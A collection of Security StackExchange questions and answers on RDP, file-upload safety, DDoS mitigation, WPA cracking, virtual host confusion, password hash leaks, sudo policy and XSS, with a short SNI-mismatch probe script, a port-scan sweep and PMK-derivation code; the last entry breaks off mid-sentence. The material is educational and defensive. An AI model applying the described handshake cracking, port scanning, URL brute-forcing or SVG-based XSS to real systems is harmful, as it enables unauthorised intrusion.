133,342
I have a sort of a conflict with my company's Security Lead Engineer. He says that Remote Desktop Protocol (RDP) is not secure enough and we should be using TeamViewer instead. We use RDP not only to access local resources inside our corporate network but also for the access to resources (running Windows 2012+) in cloud hosting. In both the scenarios how secure is it to use RDP?
I believe that TeamViewer is a proxy service for tunnelled VNC connections. Hence, the first security consideration with regard to that service is that it is MITM'ed by design. There have been suggestions that the service was compromised a couple of months ago. (Note that although VNC uses encryption, the entire exchange is not, by default, encapsulated - but it's trivial to set up an SSL/SSH/VPN tunnel.) The next consideration is that it means installing third-party software on your systems - but then, if you're running a Microsoft platform, you're already running software from multiple vendors which is probably not covered by your patch management software; keeping software up to date is one of the most effective means of protecting your systems. As long as your RDP connection is using SSL/TLS, it should be at least as secure as TeamViewer, and IMHO, a lot more so.
{ "source": [ "https://security.stackexchange.com/questions/133342", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80004/" ] }
133,347
A colleague of mine has a personal website on which he allows users to upload anything within a certain size, but before the actual upload he checks the reported type to set the file extension: if ( $type == 'image/gif'){ $ext = '.gif'; } elseif ( $type == 'image/jpeg'){ $ext = '.jpg'; } elseif ( $type == 'image/png' ){ $ext = '.png'; } else { $ext = '.png'; } He says to me that by making all files images, no harm can be done to the server. For example, evilscript.evil would become evilscript.png and thereby be rendered useless. Is there any truth to his claims?
There are basically two main ways an uploaded file can be harmful: by being executed (as a script or binary) or by being run/used in an application and abusing an exploit in it (e.g. an uploaded MP3 which is then opened by a specific player, abusing a known weakness in it). In other words, it all depends on what happens with the file after uploading. If someone is able to upload a Perl script, but the server never executes the uploaded files or does not even have Perl installed, nothing can ever happen. In general: if you make sure that the uploaded file is never run or interpreted, you will be safe. Renaming the files only helps with one thing: on some operating systems, some file extensions may be linked with a specific application. If you rename the file you might prevent it from being opened with the linked application. But depending on the system and setup, the uploaded files might still get opened with a vulnerable application. To stay with the above example: if any uploaded file gets opened with an MP3 player, even if you rename it to song.png, it would still be able to exploit a weakness in the player (unless the player has its own layer of checking and, e.g., only accepts .mp3 files). The renamed files do not suddenly become images just because of the renaming. On Unix and similar systems, there is even the file command to analyze the type/MIME type of a file. Bottom line: in my eyes there is only one thing you can do. Be very specific in your setup about what can and will be done with the uploaded files. Any libraries, extensions or applications accepting these files should always be updated to the latest version.
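To illustrate the point about checking what a file actually is rather than trusting the client-sent type, here is a minimal Python sketch (not part of the original answer; the file name is a placeholder) that inspects magic bytes, much like the Unix file command does:

IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": ".png",  # PNG
    b"\xff\xd8\xff": ".jpg",       # JPEG
    b"GIF87a": ".gif",             # GIF
    b"GIF89a": ".gif",
}

def sniff_image_extension(path):
    # Return a safe extension if the file starts with a known image signature, else None.
    with open(path, "rb") as f:
        header = f.read(8)  # the longest signature above is 8 bytes
    for signature, ext in IMAGE_SIGNATURES.items():
        if header.startswith(signature):
            return ext
    return None  # reject the upload instead of renaming it to .png

print(sniff_image_extension("upload.tmp"))

Even this only proves that the file looks like an image; it says nothing about whether the application that later opens it is free of exploitable bugs.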
{ "source": [ "https://security.stackexchange.com/questions/133347", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93973/" ] }
133,456
Can a DDoS attack reveal any information or be used to mount a hack? My understanding is that the whole point of DDoS or DoS is to consume all of the resources/overload the server causing it to crash. And that being the only reason to do a DDoS. I have heard that DDoS is used to get information. Is that true or totally false?
A DDoS will certainly give an attacker information about response times, load capability and routing. It may also give information about how incidents are handled internally and externally, as well as how they are reported to the public. But this is not what the main uses are. Generally the two key reasons for DDoS are: (1) to take a service or website offline, and (2) to distract from a wider attack, exploit or intrusion. The first is well known, very popular, and relatively straightforward to carry out, with the only defence against a large attack being a high-volume DDoS mitigation service. The second is more rarely used, but is being seen as part of an attacker's toolset. Loading the incident response team can make it harder for them to detect an intrusion, can hide the real reason for the attack, and can hide evidence of an intrusion amongst the large numbers of log entries from the DDoS.
{ "source": [ "https://security.stackexchange.com/questions/133456", "https://security.stackexchange.com", "https://security.stackexchange.com/users/121058/" ] }
133,457
If I do ping malicioussite.com or nslookup malicioussite.com , is there any risk for me? Will the people behind the malicious site know I'm looking them up? I'd like to make a program to use an IP address to find the domain and vice versa.
{ "source": [ "https://security.stackexchange.com/questions/133457", "https://security.stackexchange.com", "https://security.stackexchange.com/users/121060/" ] }
133,967
I happened to come across this (govt) website which should be HTTPS-secured, but Chrome does not show the green lock. Instead it shows this: What does it mean? How can attackers leverage this vulnerability?
The page that your browser displays on the screen might consist of many elements: the HTML code, CSS, images, etc. Also, some of the content might be provided, enhanced, or altered by (legitimate) scripts downloaded from the site. These elements might be included from the same server or from other servers. For Chrome to display the "Your connection to this site is private" message, for each element of the page: an encrypted HTTPS connection must be established, the site certificate (identity) must be valid, and non-deprecated protocols and algorithms must be used. If one or more of the elements is included through a non-encrypted HTTP link, then: if it is a script, Chrome will display the message "Your connection to this site is not private because the site loaded an insecure script." In such a case there is a possibility that the script was replaced with a malicious one; any data you receive from the site or send to the site can be intercepted and changed. If it is (only) passive content (like an image), Chrome will display the message "Your connection to this site is private but someone on the network might be able to change the look of the page." In such a case no one would be able to sniff your data or read the information that the site provided. However, by altering the look of the page you might be tricked into performing an action you did not originally intend to, for example resetting your password. Although the password change itself would be secure and legitimate, it might benefit the attacker. Also, this message is not 100% accurate. Depending on the actual passive content being included, a passive attacker can deduce what actions you took on the encrypted site. Unlike with HTTPS, with HTTP the full URL is visible, so if a certain page loads a unique set of icons, an attacker would be able to tell you reached that page.
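As a rough, hand-rolled illustration of how such mixed content can be spotted (this is an assumption for illustration, not how Chrome does it; the URL is a placeholder), a short Python sketch using only the standard library:

import re
import urllib.request

def find_insecure_resources(https_url):
    # Fetch the page and list src/href attributes that point at plain http://
    html = urllib.request.urlopen(https_url).read().decode("utf-8", errors="replace")
    return re.findall(r'(?:src|href)=["\'](http://[^"\']+)["\']', html)

for url in find_insecure_resources("https://example.gov/"):
    print("insecure element:", url)

Active elements (scripts, stylesheets) found this way trigger the stronger warning; passive ones (images) trigger the milder one.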
{ "source": [ "https://security.stackexchange.com/questions/133967", "https://security.stackexchange.com", "https://security.stackexchange.com/users/27588/" ] }
134,021
I saw in my Apache2 server logs messages like [ssl:error] [pid 28482] AH02032: Hostname xxx.yyy.zzz.www:443 provided via SNI and hostname xxx.yyy.zzz.www provided via HTTP are different One of these error message was triggered by a request from researchscan367.eecs.umich.edu , so I presume they are scanning for some known vulnerability. What kind of vulnerability or attack vector is prevented by the error?
What kind of vulnerability or attack vector is prevented by the error? The attack is called "virtual host confusion", and in 2014 several CDNs were found vulnerable to it. The main idea is that a mismatch between the target name in the TLS handshake ("provided via SNI") and the target name in the HTTP protocol ("provided via HTTP") can be exploited. Depending on the setup of the server it might be used to impersonate HTTPS sites owned by others, which can also be used to steal session cookies etc. For more information read the paper "Network-based Origin Confusion Attacks against HTTPS Virtual Hosting", read the information at HackerOne, see a video of how this attack helps to "use Akamai to bypass Internet censorship", or see the talk at Black Hat 2014 where this and other attacks against TLS were demonstrated.
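For illustration, this is roughly the kind of probe such research scanners send and what triggers AH02032 on a correctly configured server: a TLS handshake naming one host in SNI and a different host in the HTTP request. A minimal Python sketch (hostnames and address are placeholders, not from the original answer):

import socket
import ssl

sni_name = "a.example.com"    # name sent in the TLS handshake (SNI)
host_name = "b.example.com"   # different name sent in the HTTP Host header
server_ip = "192.0.2.10"      # placeholder address

ctx = ssl.create_default_context()
ctx.check_hostname = False    # we are deliberately mismatching names
ctx.verify_mode = ssl.CERT_NONE

with socket.create_connection((server_ip, 443)) as raw:
    with ctx.wrap_socket(raw, server_hostname=sni_name) as tls:
        request = "GET / HTTP/1.1\r\nHost: " + host_name + "\r\nConnection: close\r\n\r\n"
        tls.sendall(request.encode())
        print(tls.recv(4096).decode(errors="replace"))

A server that checks the two names against each other, as Apache does here, refuses to serve the request instead of routing it to an unintended virtual host.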
{ "source": [ "https://security.stackexchange.com/questions/134021", "https://security.stackexchange.com", "https://security.stackexchange.com/users/51988/" ] }
134,228
Usually (as far as I know), FTP uses port 21. Since this port is used for FTP so often, is it safer to use another port? My guess is that if someone with malicious intentions tries to break FTP accounts, they will try port 21.
It is not safe to use FTP over any port. Those with malicious intent to get into your network or system will not scan your system for port 21 only but for all ports, and will figure out the other port in virtually no time. You are better off with SFTP as your file transfer tool. On the other hand, you have the option of adding some security to your FTP transfers and ports if you run them over a VPN tunnel instead.
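To see why an unusual port is found "in virtually no time", here is a minimal (slow, sequential) Python sketch of the kind of sweep an attacker's tooling automates; real scanners such as nmap parallelise this, and the target address is a placeholder:

import socket

target = "192.0.2.10"  # placeholder

for port in range(1, 65536):
    try:
        with socket.create_connection((target, port), timeout=0.3) as s:
            banner = s.recv(64).decode(errors="replace").strip()
            if banner.startswith("220"):  # typical FTP greeting, regardless of port
                print("likely FTP service on port", port, ":", banner)
    except OSError:
        pass  # closed or filtered port

The FTP banner gives the service away on whatever port it listens, which is why moving it off port 21 is obscurity, not security.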
{ "source": [ "https://security.stackexchange.com/questions/134228", "https://security.stackexchange.com", "https://security.stackexchange.com/users/121778/" ] }
134,392
Nowadays, many mobile phones have supported unlocking through fingerprint recognition. However, both iOS and Android require users to enter the password after the device is rebooted, even though an authorized fingerprint is given. My question is: why?
First: the password is used to get access to the full disk encryption key, while the fingerprint is used to unlock the screen (of an already "decrypted" device). Encryption key retrieval must be: accurate - on each entry, the device must transform the password through a key-derivation function into the one and only correct encryption key, otherwise the device won't be able to decrypt the data; and secure - derived through a one-way function, not "unlocked" by comparing data provided by a user with a pattern stored on the device. Fingerprint recognition does not meet the above requirements. It is: fuzzy - on each press the sensor provides the device with an approximate image of a part of a fingerprint which is matched at a certain accuracy; on each verification attempt the actual data differs due to different position, skew and press strength; and non-secure - recognition is performed by comparing the actual fingerprint with data stored on the device, and this data must be both readable and modifiable, which makes it vulnerable to an attacker.
{ "source": [ "https://security.stackexchange.com/questions/134392", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102733/" ] }
134,504
What’s the difference between the process of attacking WPA and the process of attacking WPA2? I know that WPA2 is much more secure than WPA. However, it seems the case that both of them are attacked using the same mechanism — basically, capturing the handshake and then doing brute-force. Are both protocols equally vulnerable to brute-force?
WPA was just a quick update to the WEP protocol to solve some security problems until the final version of the 802.11i standard was delivered. The message integrity check, per-packet key hashing, broadcast key rotation, sequence counter and key mixing function were updated from WEP in order to patch some of the then-current vulnerabilities. This is why, in some cases, WPA is considered to be a draft of the 802.11i standard. The main difference between WPA and WPA2 is the encryption protocol used: TKIP, used by WPA, still uses the RC4 cipher like WEP, so apart from the patched vulnerabilities it has some new ones like MIC key recovery and an extended version of the chop-chop WEP attack. WPA2 is the final implementation of 802.11i and it introduces a new encryption protocol, CCMP. This new protocol uses the much stronger AES cipher (128-bit keys in CCM mode), which represents a huge improvement over RC4. Aside from this main difference, both WPA and WPA2 use the same key exchange mechanism. The 4-way handshake is used to exchange encryption keys, which is why you can attack WPA and WPA2 in the same way, by capturing the handshake and brute-forcing the PMK/PTK: the attacker tries various passphrases, computes the PMK and PTK from each, and then verifies the MIC in order to check whether the passphrase was correct.
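For illustration (a sketch of the shared brute-force step with a placeholder SSID, not code from the original answer), the PMK that both WPA and WPA2 derive from a passphrase is simply PBKDF2-HMAC-SHA1 over the SSID with 4096 iterations:

import hashlib

ssid = b"HomeNetwork"  # placeholder SSID taken from the captured handshake

def pmk(passphrase):
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

for candidate in ["password1", "letmein123", "hunter2hunter2"]:
    print(candidate, pmk(candidate).hex())
    # a real cracker would derive the PTK from this PMK and check it against the captured MIC

The 4096 iterations slow each guess down a little, but a weak passphrase still falls quickly, which is why the handshake-capture attack works identically against both protocols.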
{ "source": [ "https://security.stackexchange.com/questions/134504", "https://security.stackexchange.com", "https://security.stackexchange.com/users/112259/" ] }
134,582
Do I need to buy a firewall? The website networksecure247.com is trying to sell me one. They call and say that "alerts" keep coming up on my network. I have a 2013 Dell computer, and the firewall from Microsoft expired on August 16. This company, Network Secure, is telling me that I need a firewall. Do I?
You needn't buy anything from someone who calls you unsolicited and tells you that you need to buy something from them. In fact, you're generally better off not buying things from people who call you unsolicited. In fact, you're generally better off not even listening to people who call you unsolicited to sell you things, and just hanging up on them instead. Particularly when they lie to you about things like "alerts keep coming up on your network", which is patently absurd. The Microsoft firewall does not expire. Not on 8/16/16, or on any other date. It is a component of Windows and is good for all eternity, or as long as your computer lasts, whichever comes first. There is no need to buy an additional host-based (in other words, one that runs on your computer) firewall.
{ "source": [ "https://security.stackexchange.com/questions/134582", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122130/" ] }
134,679
The way that we hash passwords and the strength of the passwords are important because if someone gets access to the hashed passwords, it's possible to try lots and lots of passwords in a surprisingly short amount of time and crack anything that is weak. The question I have is: how does the attacker get access to the hashed passwords in the first place? If they have access to the /etc/shadow file, for example, isn't it already game over? Is it simply bad permission settings? Backups? Other mistakes? Is it that once one system is compromised, the passwords from there are used to attempt to get into other systems? I guess ultimately my query boils down to the implication I get from reading about this subject that it's inevitable that the attacker will get access to the hashes. How does that happen in practice?
There are any number of ways: SQL injection, leaked backups, disgruntled employees leaking them, or any kind of breach of the server that allows code execution. As you can see there are many, many ways this could happen - as phihag mentions in the comments, more than half of the OWASP top 10 could lead to leaked hashes - so they cannot be easily tabulated in a post. This does not mean that it is inevitable that hackers get the hashes, but you should still use a good hashing algorithm to protect yourself and your users just in case. Since a backup may be lost or your server hacked without you ever noticing, having properly hashed passwords should be the only thing that allows you to sleep at night. This strategy is known as "defence in depth", or just simply "plan for the worst".
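A minimal sketch of that "plan for the worst" advice, using only the Python standard library (scrypt is one reasonable choice here; bcrypt or Argon2 would serve the same purpose):

import hashlib
import hmac
import os

def hash_password(password):
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return hmac.compare_digest(candidate, digest)

With a memory-hard, salted hash like this, a leaked table of hashes is far less useful to whoever obtained it.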
{ "source": [ "https://security.stackexchange.com/questions/134679", "https://security.stackexchange.com", "https://security.stackexchange.com/users/88460/" ] }
134,767
How can an ISP with low bandwidth like 50 Gbps handle a DDoS attack with more than this? I know there is a solution called "Black Hole". Is this enough to mitigate DDoS attacks or are there any other enterprise solutions? What kind of DDoS mitigating services are now available? Can CDN mitigate DDoS attack?
There are a number of strategies, each having their own costs and benefits. Here are a few (there are more, and variations): Blackholing: by blackholing traffic, you discard all traffic towards the target IP address. Typically, ISPs try to use RTBH (remotely triggered blackholing), by which they can ask their upstream networks to discard the traffic, so it won't even reach the destination network. The benefit here is that it will not saturate the ISP's uplinks. The biggest drawback is that you do exactly what the attackers want: the target IP address (and thus the services running on it) is offline. However, the rest of the ISP's customers will not suffer from the attack, and the costs are low. Selective blackholing: instead of blackholing an IP address for the entire internet, it may be useful to change BGP routing for the targeted address range so that it is only reachable from parts of the internet. This is typically called 'selective blackholing' and is implemented by a number of large carriers. The idea is that many internet services only need to be available in a specific region (typically a country or continent). For example, using selective blackholing, a Dutch ISP under attack could choose to have its IP ranges blackholed for traffic coming from China, while European IPs would still be able to reach the targeted address. This technique can work very well if attack traffic is coming from very different sources than regular traffic. Scrubbing: a nicer solution is to use a scrubbing center, usually hosted outside the ISP's network as a service. When under DDoS attack, the ISP redirects traffic for that IP range to the scrubbing center. The scrubbing center has the equipment to filter unwanted traffic, leaving a stream of (mostly) clean traffic which gets routed back to the ISP. Compared to blackholing this is a better solution, since the services on the target IP remain available. The drawback is that most scrubbing centers are commercial and can cost quite a lot. Also, scrubbing is not always easy; there can be both false positives (wanted traffic being filtered) and false negatives (unwanted traffic not being filtered). Traffic engineering: ISP networks usually have a number of connections to the internet via transit providers and/or internet exchange points. By making these connections, as well as links within the backbone of the ISP, much bigger than is needed for normal traffic patterns, the network can cope with DDoS attacks. However, there's a practical limit to this, since unused bandwidth capacity is costly (for example, investing in 100 Gbps equipment and upstream connections is very expensive and cost-inefficient if you're only doing a few Gbps) and this usually only moves the problem to somewhere within the network: somewhere there will be a switch, router or server with smaller capacity, and that will become the choke point. With some attacks, ISPs may be able to balance incoming traffic in a way that means not all external connections will be flooded, and only one or a few will become saturated. Within larger networks, it's possible to create a "sinkhole" router which only attracts traffic for the IP range under attack. Traffic towards all other IP ranges gets routed over other routers. This way, the ISP is able to isolate the DDoS to a certain degree by announcing the targeted IP range in BGP only on the sinkhole router, while stopping announcement of that IP range on other routers. Traffic from the internet to that destination will be forced through that router. This may lead to all uplinks of that sinkhole router being saturated, but uplinks on other routers will not be flooded and other IP ranges will not be affected. The big drawback here is that the entire range in which the targeted IP sits (at least a /24) may suffer from this. This solution is often the last resort. Local filtering: if the ISP has enough capacity on its uplinks (so they won't be saturated), it can implement local filtering. This can be done in various ways, for example: adding an access list on routers rejecting traffic on characteristics like the source address or destination port (if the number of source IP addresses in an attack is limited, this can work efficiently); implementing traffic rate limiters to reduce the amount of traffic to the target IP address; routing traffic through local scrubbing boxes which filter unwanted traffic; or implementing BGP Flowspec, which allows routers to exchange filter rules using BGP (for example: 'reject all traffic from IP address X to IP address Y, protocol UDP, source port 123'). Content delivery networks and load balancing: web hosters can use content delivery networks (CDNs) to host their websites. CDNs use global load balancing and thus have enormous amounts of bandwidth and caching server clusters all over the world, making it hard to take down a website completely. If one set of servers goes down due to a DDoS, traffic gets redirected automatically to another cluster. A number of big CDNs also operate as scrubbing services. On a somewhat smaller scale, local load balancing can be deployed. In that case, a pool of servers is available to host a website or web application. Traffic gets distributed over the servers in that pool by a load balancer, thus increasing the amount of server capacity available, which may help to withstand a DDoS attack. Of course, CDNs and load balancing only work for hosting; they don't work for access ISPs.
{ "source": [ "https://security.stackexchange.com/questions/134767", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122088/" ] }
134,813
I have a website that is available on the public internet. The website requires authenticated login before any of the content can be accessed. I've been asked if I can remove the login wall for users on a single static IP (the organisation's office) to allow them to read the content. Login would still be required for any write operations. This feels like a bad idea to me, but I'm struggling to come up with a concrete reason not to. Auditing read access to the content isn't a concern for the client. Ignoring the possibility that the IP address could change, are there any reasons why this is a bad idea? Are there any ways this could be exploited?
You don't have to worry about spoofing the IP from a different connection, because the returned TCP packets would not make it to the attacker in that scenario. So all you have to worry about is how easy it is for the attacker to make use of that IP: Is that IP shared between multiple computers in the office? Can that IP be used on WiFi? How well is the password kept when a visitor says 'can I use your WiFi'? Are all the computers with access to that IP well secured, and do they have competent users? If the IP is not well kept, then you should ask: in addition to the IP, can you have a cookie stored on the single machine that is authorized (i.e. a limited-use Remember Me feature)? I commend your client for not using the Remember Password feature, as is so tempting to do. Also, how secure is your content? What are the damages of the content being viewed by unauthorized persons? What type of attackers would be attracted to your content?
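A minimal, framework-agnostic Python sketch of the check being proposed (the office address is a placeholder; the key detail is to compare against the TCP peer address, never a client-supplied header such as X-Forwarded-For, which can be spoofed):

import ipaddress

OFFICE_IP = ipaddress.ip_address("203.0.113.7")  # placeholder static office IP

def read_access_allowed(remote_addr, authenticated):
    if authenticated:
        return True
    # remote_addr must be taken from the TCP connection, not from request headers
    return ipaddress.ip_address(remote_addr) == OFFICE_IP

Write operations would still go through the normal login path regardless of this check.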
{ "source": [ "https://security.stackexchange.com/questions/134813", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122327/" ] }
134,939
Example URL www.[somewebsite].com/[10_digit_number] Getting the correct number loads a page. I know there would be 10 billion possible digits to choose from, but how long would it take? What are the resources one would need?
About a day. If we're lucky: there's no throttling, we can perform each test with a HEAD request, can perform many tests on a single HTTP connection with keepalive, and can have many concurrent connections. In that case we're mostly limited by bandwidth. Say we craft a tight request that is 100 bytes; that means we need to send a total of 100 * 10^10 bytes. And let's suppose we have a decent 100 Mbps connection, which will do about 10 megabytes per second. That would take 100,000 seconds - just over a day. This is the best case; in practice there are likely to be issues that prevent it working so fast. We could have multiple systems working simultaneously to make it faster - but at some point we'll overload the server.
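Spelling the back-of-the-envelope arithmetic out in Python (same assumptions as above):

requests = 10**10          # every possible 10-digit number
request_bytes = 100        # one tight HEAD request
bandwidth = 10 * 10**6     # ~100 Mbps, roughly 10 MB/s

total_bytes = requests * request_bytes      # 10**12 bytes, about 1 TB
seconds = total_bytes / bandwidth           # 100,000 seconds
print(seconds, "seconds =", round(seconds / 86400, 1), "days")

That prints 100,000 seconds, about 1.2 days, before accounting for throttling, rate limits or server capacity.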
{ "source": [ "https://security.stackexchange.com/questions/134939", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122460/" ] }
135,211
I've been reading a bit about neural networks, and their ability to approximate many complex functions. Wouldn't a neural network be capable of cracking a hashing algorithm like SHA256? For example, say we want to train our network to crack strings of 8 characters that were hashed. We could go through all the permutations and train the network since we know the inputs and expected outputs. Would the network technically be able to crack a relatively good amount of SHA256 hashes that map back to 8-character strings? Has this been done previously?
No. Neural networks are pattern matchers. They're very good pattern matchers, but pattern matchers just the same. No more advanced than the biological brains they are intended to mimic. More thorough, more tireless, but not more sophisticated. The patterns have to be there to be found. There has to be a bias in the data to tease out. But cryptographic hashes are explicitly and extremely carefully designed to eliminate any bias in the output. No one bit is more likely than any other, no one output is more likely to correlate to any given input. If such a correlation were found, the hash would be considered "broken" and a new algorithm would take its place. Flaws in hash functions have been found before , but never with the aid of a neural network. Instead it's been with the careful application of certain mathematical principles.
{ "source": [ "https://security.stackexchange.com/questions/135211", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34785/" ] }
135,352
Every hardening guide I read recommends forbidding to login to root account and instead using sudo . I can understand this if you set a strict sudoers file which only enables the necessary commands for each group and user. But on every server I put my foot on, I have only witnessed a non restrictive sudo configuration. I would like to understand if it is a good practice or not and why (still, I understand the traceability reason)? So here are my questions : Is it enough to forbid su and allow sudo in order to keep the traceability of the administrator actions ? (I can imagine a scenario where a user does a lot of sudo actions before deleting his bash_history) Is there another source beside .bash_history useful to keep traceability ? can such a file be updated by an administrator (with sudo) ? Is it possible to restrict sudo -i and sudo -s in the configuration ? Can sudo command have utility without a strong sudoers configuration ? If yes, which ones? Moreover, for a single user, I see only advantages to forbid sudo and enable su . Indeed, Log on with root and normal user using the same password seems to be a bad practice.
Your question is rather broad, touching on several different subjects. It may be better to take some of the details and put them in a separate question. Is it enough to forbid su and allow sudo in order to keep the traceability of the administrator actions? ... can the sudo command have utility without a strong sudoers configuration? Which ones? Unrestricted sudo has a couple of benefits over su . Each sudoer can use his personal password. This way you do not have to re-distribute the root password if it is changed. sudo can be configured to log activity. If your syslog configuration writes to a remote location, then it becomes difficult for someone to cover their tracks. However, unrestricted root access is still 'unrestricted'. If you do not use a remote syslog server then tracks can easily be covered. For convenience, folks will often use sudo -s to get an interactive shell. This allows you to get bash autocomplete on restricted directories. Unfortunately, the syslog benefits are void if a person is allowed to run sudo -s . Also, there are many alternatives to sudo -s that can allow commands to be run without specific logging. (I can imagine a scenario where a user does a lot of sudo actions before deleting his bash_history) bash_history is not to be used as a history trace tool. It is only for user convenience. Is there another source beside .bash_history useful to keep traceability? Can such a file be updated by an administrator (with sudo)? Any files on the server can be updated by a person with unrestricted root access (whether via sudo or su ). How to trace the activity of a root user may be the subject of a different question. I believe advanced configurations of SELinux can do this, but it is probably not practical. I don't know of any other way to trace the activity of a root user. As I said, if you have any logging, it will have to be written to a remote log server to keep the logs from being erased by the attacker. Is it possible to restrict sudo -i and sudo -s in the configuration? To answer you verbatim, this may be possible, but it is beyond the scope of this post. Consider creating a new question. However, this will not solve your problem. For example, one could use sudo su instead of sudo -s . One could edit the sudoers file, or update the crontab , etc. The only way to solve this is to 'restrict' the sudo abilities using a whitelist. As you said, this is not nearly as common, but it is certainly the only way to accomplish the goal of reliable traceability with any level of detail. Hope this helps. Feel free to ask for clarification on my answer, or post a more specific question if you have new questions based on what you learned so far.
{ "source": [ "https://security.stackexchange.com/questions/135352", "https://security.stackexchange.com", "https://security.stackexchange.com/users/38142/" ] }
135,359
This is a follow up on Is there a legitimate reason I should be required to use my company’s computer . Mostly, because I see a huge issue in a couple of specific situations. Had I been in a position of the security engineer for an organization I would definitely put a policy that only company computers shall be used. That does make sense, and protects not only company data but the liability of employees. Yet, there is one case in which such a policy bugs me: A competent developer (I'm not talking about a junior developer, I'm talking about a middle to senior level developer) will potentially have on his work machine: 17 database engines; 20 docker containers; 10 test virtual machines (let's say using something like qemu ). That is a very common scenario in startups and post-startups (a startup that managed to survive several years). Moreover, this developer will be changing his docker containers and virtual machines every week, since he will probably be testing new technology. Requiring this developer to refer to the security engineer to install new software every time is completely impractical. Moreover, since a company would have more than one such developer, going with the typical company managed computers for everyone involves drawbacks: Maintaining the computers of, say, six such developers is a full time job for a competent security engineer. The manager of those developers will be terribly angry because what his team is doing for 50% of their work-time is to wait for the security engineer. On the other hand allowing the developers to use the machines freely is dangerous: one rogue docker container or virtual machine and you have an insider. I would even say that these developer's computers are more dangerous than that of a common user (say, a manager with spreadsheet software). How do you make sensible policies for competent developers? Here are some other solutions I could think of (or saw in the past), most of which were pretty bad: Disallow internet access from the development machines: You need internet access to read documentation; You need to access repositories, often found on the internet. Give developers two computers, one for internet and one for development machines: Complaints about lost productivity: typing Alt+2 to get the browser is faster than switching to another computer; Repository access is cumbersome: download in one place, copy to the other. Encourages the developer to circumvent the security and make a USB-based connection between both machines, so he can work from a single computer (saw it happening more than once). Move development to the servers (i.e. not development on desk machines): This is just moving the same problem deeper, now the rogue container is on the server; Arguably worse than allowing the developer to do what he pleases on his own machine. There must be a better way.
Separate development and production It is usual practice to give developers local admin / root rights on their workstation. However, developers should only have access to development environments and never have access to live data. Sys-admins - who do have access to production - should have much more controlled workstations. Ideally, sys-admin workstations should have no Internet access, although that is rare in practice. A variation I have seen is that developers have a locked-down corporate build, but can do whatever they want within virtual machines. However, this can be annoying for developers, as VMs have reduced performance, and the security benefits are not that great. So it's more common to see developers simply having full access to their own workstation.
{ "source": [ "https://security.stackexchange.com/questions/135359", "https://security.stackexchange.com", "https://security.stackexchange.com/users/112042/" ] }
135,486
I'm helping with a one-hour training for developers (~100 of them) on cross-site scripting. What are some concepts you think are indispensable to get across to them? Right now we have: Difference between reflected and stored Layers of defense ( WAFs , browser defenses, server headers, and secure coding) Secure coding and context of encoding parameters And most of all, the potential impact of vulnerabilities.
From a developer's perspective, the first two points you have are not very relevant. Stored and Reflected XSS have the same mitigation: properly escape things you output according to their context. Layers of defense will likely only be viewed as an excuse for poorly implementing this mitigation: "The WAF will catch it for me." Instead, focus on these code hygiene practices: Validate, not escape, at input. Input validation should be only for ensuring the input makes sense, not that it is "safe". It's impossible to know at this point whether it is safe, since you don't know all the places it will be used. Assume all data is unsafe. Never make the assumption that some data has been escaped, or does not include tags or quotes or entities or whatever. Understand that unsafe input can come from anywhere: HTTP headers, cookies, URL parameters, bulk import data, etc. Escape at point of use. Escape the data for the context in which it is used, when it is used. Only want to escape once to improve performance? Name the destination variable according to where it is safe to use: jsstringsafeEmail , htmlattrsafeColor , htmltextsafeFullName , etc.
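As a small illustration of "escape at point of use, per context", here is a Python sketch using only the standard library (not part of the original answer; the variable names are a snake_case adaptation of the naming convention above):

import html
import json

full_name = '<script>alert(1)</script>"; stealCookies(); //'

htmltextsafe_full_name = html.escape(full_name)  # safe in HTML text and quoted attribute context
jsstringsafe_full_name = json.dumps(full_name).replace("<", "\\u003c")  # safe as a JS string literal, also neutralises "</script>"

print(htmltextsafe_full_name)
print(jsstringsafe_full_name)

The same untrusted value needs a different encoder for each destination, which is exactly why escaping once on input cannot work.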
{ "source": [ "https://security.stackexchange.com/questions/135486", "https://security.stackexchange.com", "https://security.stackexchange.com/users/13768/" ] }
135,499
If I have selected a good password and kept it secret, what is the point of encrypting my home directory, as a setup option with some flavors of Linux offer during setup? Won't the Linux permissions keep unwanted eyes away from my stuff?
The point is to protect against your disk being accessed outside of the OS. Encryption is useful against attackers who have physical access to your computer. Without it, it would be trivial to read out the content of your home directory, for example by plugging in a live boot USB stick.
{ "source": [ "https://security.stackexchange.com/questions/135499", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76484/" ] }
135,513
Most WAFs, when blocking XSS, will block obvious tags like script and iframe , but they don't block img . Theoretically, you can use img src='OFFSITE URL' , but what's the worst that can happen? I know you can steal IPs with it, but is that it?
Like Anders says, Blender makes a very good point about authentication dialogs, and multithr3at3d is right about the on* attributes. Moreover, Anders also argues about the a tag, and Matija has a good link about exploiting the libraries doing the rendering. Yet no one has talked about SVG yet. First of all, let's assume that all input and output is properly sanitized so tricks with onerror / onload are not possible, and that we are not interested in CSRF. We are after XSS. The first concern about <img src= is that it does not follow the same origin policy. But that is probably less dangerous than it sounds. What the browser does to render an <img> tag such as <img src="http://domain/image.png"> is pretty safe, because the browser will not invoke a parser (e.g. an XML or HTML parser); it knows that what will come is an image (gif, jpeg, png). The browser will perform the HTTP request, and it will simply read the MIME type of what came back (in the Content-Type header, e.g. image/png ). If the response does not have a Content-Type, several browsers will guess based on the extension, yet they will only guess image MIMEs: image/jpeg , image/png or image/gif (tiff, bmp and ppm are dubious; some browsers may have limited support for guessing them). Some browsers may even try to guess the image format based on magic numbers, but then again they will not try to guess esoteric formats. If the browser can match the (possibly guessed) MIME it loads the correct rendering library; rendering libraries may have an overflow, but that is another story. If the MIME does not match an image rendering library, the image is discarded. If the rendering library call fails, the image is discarded as well. The browser is never even close to an execution (script) context. Most browsers enter execution context only from the javascript parser, and they can only reach the javascript parser from the application/javascript MIME or from the XML or HTML parsers (since they may have embedded scripts). To perform XSS we need an execution context. Enter SVG. Using <img src="domain/blah/blah/tricky.svg"> : ouch, ouch, ouch. SVG is an 